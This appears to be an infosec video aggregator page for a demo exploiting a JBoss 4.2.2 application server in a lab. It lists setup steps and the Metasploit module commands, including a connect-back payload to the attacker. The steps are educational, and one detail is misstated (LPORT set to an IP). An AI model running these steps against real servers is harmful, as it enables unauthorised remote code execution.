Description: JBoss Application Server (or JBoss AS) is an open-source Java EE-based application server. An important distinction for this class of software is that it not only implements a server that runs on Java, but it actually implements the Java EE part of Java. Since it is Java-based, the JBoss application server operates cross-platform: usable on any operating system that supports Java. JBoss AS was developed by JBoss, now a division of Red Hat.
Credits: http://en.wikipedia.org/wiki/JBoss_application_server
This video is a simple demo of exploiting a JBoss server. The steps are as follows.
1. Download jboss_4_2_2_GA.zip
2. Unzip JBoss
3. Go to the JBoss directory and run ./run.sh
Metasploit steps:
1. search jboss
2. use exploit/multi/http/jboss_deploymentfilerepository
3. show options
4. Set RHOST to the JBoss IP
5. Set LPORT to the machine IP
6. exploit
Tags: metasploit, exploit, jboss-server
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Both Windows and Linux can be targeted.
It's true for all OSes which support Java.
This method will only work if the target server allows outbound connections to us.